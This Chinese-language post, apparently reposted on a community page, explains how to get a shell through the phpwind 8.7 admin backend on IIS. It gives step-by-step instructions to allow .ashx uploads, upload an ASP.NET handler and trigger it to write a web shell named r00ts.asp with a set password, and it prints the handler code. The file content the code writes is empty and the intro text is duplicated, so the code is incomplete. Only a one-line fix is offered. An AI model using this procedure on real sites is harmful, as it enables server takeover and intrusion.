php8.7 入侵管理员密码,phpwind 8.7后台拿shell及修复
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx打开之后空白 会在目录底下生成r00ts.asp 密码r00ts下面是代码:using System;using System
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
下面是代码:
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
file1.Write("");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
www.hackdig.com提供修复方案:
只保留php后缀可执行就完了
魔乐社区(Modelers.cn) 是一个中立、公益的人工智能社区,提供人工智能工具、模型、数据的托管、展示与应用协同服务,为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作,由全产业链共同建设、共同运营、共同享有,推动国产AI生态繁荣发展。
更多推荐
0
0- 0
已为社区贡献5条内容
所有评论(0)